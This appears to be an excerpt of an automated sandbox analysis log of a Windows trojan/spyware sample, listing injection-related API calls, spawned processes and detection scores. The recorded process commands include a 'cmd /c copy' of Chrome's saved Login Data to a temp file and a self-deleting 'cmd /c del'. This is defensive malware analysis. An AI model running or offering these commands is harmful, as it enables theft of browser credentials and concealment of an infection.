Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA,	26_2_0229CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A0754 NtWriteVirtualMemory,LoadLibraryA,	26_2_022A0754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_02332AD2 NtResumeThread,	27_2_02332AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_023323E2 NtProtectVirtualMemory,	27_2_023323E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_0232C88B NtAllocateVirtualMemory,LoadLibraryA,	27_2_0232C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_023306A2 NtWriteVirtualMemory,LoadLibraryA,	27_2_023306A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_0233322B NtWriteVirtualMemory,	27_2_0233322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_0232CE0C NtWriteVirtualMemory,LoadLibraryA,	27_2_0232CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_02330754 NtWriteVirtualMemory,LoadLibraryA,	27_2_02330754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	28_2_1EA32DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk,	28_2_1EA32D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk,	28_2_1EA32B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk,	28_2_1EA32B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA334E0 NtCreateMutant,LdrInitializeThunk,	28_2_1EA334E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32EB0 NtProtectVirtualMemory,	28_2_1EA32EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32E80 NtCreateProcessEx,	28_2_1EA32E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32EC0 NtQuerySection,	28_2_1EA32EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32ED0 NtResumeThread,	28_2_1EA32ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32E00 NtQueueApcThread,	28_2_1EA32E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32E50 NtCreateSection,	28_2_1EA32E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32FB0 NtSetValueKey,	28_2_1EA32FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32F30 NtOpenDirectoryObject,	28_2_1EA32F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32F00 NtCreateFile,	28_2_1EA32F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA33C90 NtOpenThread,	28_2_1EA33C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32CF0 NtDelayExecution,	28_2_1EA32CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32CD0 NtEnumerateKey,	28_2_1EA32CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C20 NtSetInformationFile,	28_2_1EA32C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C30 NtMapViewOfSection,	28_2_1EA32C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA33C30 NtOpenProcessToken,	28_2_1EA33C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C10 NtOpenProcess,	28_2_1EA32C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C50 NtUnmapViewOfSection,	28_2_1EA32C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32DA0 NtReadVirtualMemory,	28_2_1EA32DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32D50 NtWriteVirtualMemory,	28_2_1EA32D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32AA0 NtQueryInformationFile,	28_2_1EA32AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32A80 NtClose,	28_2_1EA32A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32AC0 NtEnumerateValueKey,	28_2_1EA32AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32A10 NtWriteFile,	28_2_1EA32A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B80 NtCreateKey,	28_2_1EA32B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32BE0 NtQueryVirtualMemory,	28_2_1EA32BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32BC0 NtQueryInformationToken,	28_2_1EA32BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B20 NtQueryInformationProcess,	28_2_1EA32B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B00 NtQueryValueKey,	28_2_1EA32B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA338D0 NtGetContextThread,	28_2_1EA338D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA329F0 NtReadFile,	28_2_1EA329F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA329D0 NtWaitForSingleObject,	28_2_1EA329D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA34570 NtSuspendThread,	28_2_1EA34570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA34260 NtSetContextThread,	28_2_1EA34260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_005723E2 NtProtectVirtualMemory,	28_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,	28_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00563CE1 NtProtectVirtualMemory,	28_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00563E0E NtProtectVirtualMemory,	28_2_00563E0E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	29_2_1E8F2DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,	29_2_1E8F2D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,	29_2_1E8F2B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	29_2_1E8F2B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,	29_2_1E8F34E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2E80 NtCreateProcessEx,	29_2_1E8F2E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2EB0 NtProtectVirtualMemory,	29_2_1E8F2EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2EC0 NtQuerySection,	29_2_1E8F2EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2ED0 NtResumeThread,	29_2_1E8F2ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2E00 NtQueueApcThread,	29_2_1E8F2E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2E50 NtCreateSection,	29_2_1E8F2E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2FB0 NtSetValueKey,	29_2_1E8F2FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2F00 NtCreateFile,	29_2_1E8F2F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2F30 NtOpenDirectoryObject,	29_2_1E8F2F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F3C90 NtOpenThread,	29_2_1E8F3C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2CD0 NtEnumerateKey,	29_2_1E8F2CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2CF0 NtDelayExecution,	29_2_1E8F2CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C10 NtOpenProcess,	29_2_1E8F2C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C20 NtSetInformationFile,	29_2_1E8F2C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F3C30 NtOpenProcessToken,	29_2_1E8F3C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C30 NtMapViewOfSection,	29_2_1E8F2C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C50 NtUnmapViewOfSection,	29_2_1E8F2C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2DA0 NtReadVirtualMemory,	29_2_1E8F2DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2D50 NtWriteVirtualMemory,	29_2_1E8F2D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2A80 NtClose,	29_2_1E8F2A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2AA0 NtQueryInformationFile,	29_2_1E8F2AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2AC0 NtEnumerateValueKey,	29_2_1E8F2AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2A10 NtWriteFile,	29_2_1E8F2A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B80 NtCreateKey,	29_2_1E8F2B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2BC0 NtQueryInformationToken,	29_2_1E8F2BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2BE0 NtQueryVirtualMemory,	29_2_1E8F2BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B00 NtQueryValueKey,	29_2_1E8F2B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B20 NtQueryInformationProcess,	29_2_1E8F2B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F38D0 NtGetContextThread,	29_2_1E8F38D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F29D0 NtWaitForSingleObject,	29_2_1E8F29D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F29F0 NtReadFile,	29_2_1E8F29F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F4570 NtSuspendThread,	29_2_1E8F4570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F4260 NtSetContextThread,	29_2_1E8F4260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_005723E2 NtProtectVirtualMemory,	29_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,	29_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00563CE1 NtProtectVirtualMemory,	29_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00563E0E NtProtectVirtualMemory,	29_2_00563E0E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	30_2_1E902DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk,	30_2_1E902D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk,	30_2_1E902B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk,	30_2_1E902B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9034E0 NtCreateMutant,LdrInitializeThunk,	30_2_1E9034E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902E80 NtCreateProcessEx,	30_2_1E902E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902EB0 NtProtectVirtualMemory,	30_2_1E902EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902ED0 NtResumeThread,	30_2_1E902ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902EC0 NtQuerySection,	30_2_1E902EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902E00 NtQueueApcThread,	30_2_1E902E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902E50 NtCreateSection,	30_2_1E902E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902FB0 NtSetValueKey,	30_2_1E902FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902F00 NtCreateFile,	30_2_1E902F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902F30 NtOpenDirectoryObject,	30_2_1E902F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E903C90 NtOpenThread,	30_2_1E903C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902CD0 NtEnumerateKey,	30_2_1E902CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902CF0 NtDelayExecution,	30_2_1E902CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C10 NtOpenProcess,	30_2_1E902C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E903C30 NtOpenProcessToken,	30_2_1E903C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C30 NtMapViewOfSection,	30_2_1E902C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C20 NtSetInformationFile,	30_2_1E902C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C50 NtUnmapViewOfSection,	30_2_1E902C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902DA0 NtReadVirtualMemory,	30_2_1E902DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902D50 NtWriteVirtualMemory,	30_2_1E902D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902A80 NtClose,	30_2_1E902A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902AA0 NtQueryInformationFile,	30_2_1E902AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902AC0 NtEnumerateValueKey,	30_2_1E902AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902A10 NtWriteFile,	30_2_1E902A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B80 NtCreateKey,	30_2_1E902B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902BC0 NtQueryInformationToken,	30_2_1E902BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902BE0 NtQueryVirtualMemory,	30_2_1E902BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B00 NtQueryValueKey,	30_2_1E902B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B20 NtQueryInformationProcess,	30_2_1E902B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9038D0 NtGetContextThread,	30_2_1E9038D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9029D0 NtWaitForSingleObject,	30_2_1E9029D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9029F0 NtReadFile,	30_2_1E9029F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E904570 NtSuspendThread,	30_2_1E904570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E904260 NtSetContextThread,	30_2_1E904260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_005723E2 NtProtectVirtualMemory,	30_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,	30_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_00563CE1 NtProtectVirtualMemory,	30_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_00563E0E NtProtectVirtualMemory,	30_2_00563E0E

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\explorer.exe	Process Stats: CPU usage > 98%
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process Stats: CPU usage > 98%

Source: Zr26f1rL6r.exe, 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000000.47306458832.0000000000422000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000003.47933945787.00000000008FF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47938539485.00000000000DC000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47954454517.000000001EB60000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe	Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll

Source: Zr26f1rL6r.exe

Static PE information: invalid certificate

Source: Zr26f1rL6r.exe	Virustotal: Detection: 40%
Source: Zr26f1rL6r.exe	ReversingLabs: Detection: 20%

Source: Zr26f1rL6r.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

File created: C:\Users\user\AppData\Local\Temp\~DFBF74AAE9E8A330D2.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/6@68/14

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
